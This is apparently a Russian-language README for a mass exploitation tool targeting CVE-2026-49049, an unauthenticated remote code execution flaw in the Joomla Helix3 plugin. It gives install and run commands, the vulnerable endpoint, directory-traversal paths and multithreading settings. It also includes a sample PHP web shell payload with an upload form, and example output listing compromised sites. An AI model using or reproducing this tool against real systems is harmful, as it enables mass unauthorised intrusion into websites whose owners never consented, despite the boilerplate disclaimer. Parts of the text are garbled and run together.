
Массовый сканер уязвимостей для CVE-2026-49049 – неаутентифицированное удалённое выполнение кода в плагине Joomla Helix3. Многопоточный, обнаруживает как выполненные, так и сырые PHP-пейлоады.
Массовый сканер уязвимости CVE-2026-49049 — неаутентифицированное удалённое выполнение кода в Joomla Helix3 Framework.
Этот инструмент проверяет множество сайтов на Joomla на наличие уязвимости CVE-2026-49049 в плагине Helix3. Уязвимость позволяет неаутентифицированному злоумышленнику загружать и выполнять произвольный PHP-код на целевом сервере.
Сканер пытается:
com_ajax с плагином helix3.requestspip install requests
🛠 Установка
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py
🚀 Использование
python2 cve-2026-49049.py targets.txt
Формат входных данных
Каждая строка в targets.txt должна содержать один домен или IP-адрес:
example.com
https://example.com
http://192.168.1.100
Выходные файлы
Файл Описание results.txt Уязвимые URL-адреса, на которых полезная нагрузка была выполнена rez.txt URL-адреса, на которых полезная нагрузка была загружена, но не выполнена (raw PHP)
Пример вывода
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================
[*] Loaded 150 targets
[*] Using 20 threads
[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com
============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5
[+] Vulnerable URLs:
https://target.com/tmp_123456.php.json
⚙️ Конфигурация
Вы можете настроить следующие переменные внутри скрипта:
Переменная По умолчанию Описание THREADS 20 Количество одновременных потоков PATHS ['../../../', '../../../../'] Пути обхода каталогов TIMEOUT 5 Тайм-аут HTTP-запроса RESULT_FILE 'results.txt' Выходной файл для уязвимых сайтов RAW_RESULT_FILE 'rez.txt' Выходной файл для сайтов с raw PHP
🧠 Как это работает
Скрипт отправляет POST-запрос на:
/index.php?option=com_ajax&plugin=helix3&format=json
с полезной нагрузкой, которая:
Затем он проверяет, доступен ли файл и выполняется ли PHP-код или просто отображается в виде обычного текста.
Пример полезной нагрузки
<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>
⚠️ Отказ от ответственности
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования.
Несанкционированное использование этого инструмента против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным инструментом.
Более подробный отказ от ответственности вы можете увидеть на странице Jenderal92. Вы можете проверить его ЗДЕСЬ !!!